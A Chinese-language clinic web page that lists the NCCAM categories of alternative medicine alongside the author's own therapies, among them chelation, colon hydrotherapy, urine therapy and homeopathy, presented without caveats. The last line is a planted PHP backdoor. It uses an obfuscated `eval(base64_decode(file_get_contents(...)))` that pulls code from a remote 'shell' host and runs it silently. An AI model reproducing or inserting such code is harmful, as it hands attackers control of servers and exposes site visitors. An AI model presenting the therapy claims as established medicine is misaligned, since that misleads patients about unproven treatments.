收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 先進國家的另類醫學
先進國家的另類醫學 列印 E-mail
        西元一九九八年成立的美國國家輔助及另類醫學中心(National Center for Complementary and Alterative Medicine, NCCAM)將輔助及另類醫學劃分為五個範疇:

· 另類醫學(Alterative Medicine systems)
  泛指有完整理論基礎及臨床實務的醫學,如中醫、順勢醫學及印度醫學等;我在臨床上採用的是中醫、螯合療法、營養療法、內分泌平衡療法(荷爾蒙取代療法HRT)、針灸、大腸水療與順勢療法等。

· 身心療法(mind-body intervention)
  泛指促進心靈能力的療法,如藝術療法、祈禱等;我在臨床上採用花療法、醫學芳療等。

· 生物療法(biologicallybased therapies)
   泛指利用自然界的物質如:草藥及健康食品等;我在臨床上採用生機飲食、過敏食物篩選、酵素療法,並研發靈芝、當歸、五行酵素……等與預防保健相關的食品。

· 操作及身體療法(manipulative and body-based methods)
   泛指用手或移動身體的操作治療,如整骨及按摩;我在臨床上採用整脊、醫學芳香療法等。

· 能量療法(energy therapies)
   分為兩類型,一為生物場療法,利用能量來治療,如氣功及靈氣;我在臨床上研究開發汰惡(Diode),運用在能量醫療。二為生物電磁場療法,如磁療;我在臨床上採用傅爾電針、能量轉換(尿)療法、低頻療法、磁玉色三合一療法等。
 
< 前一個
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));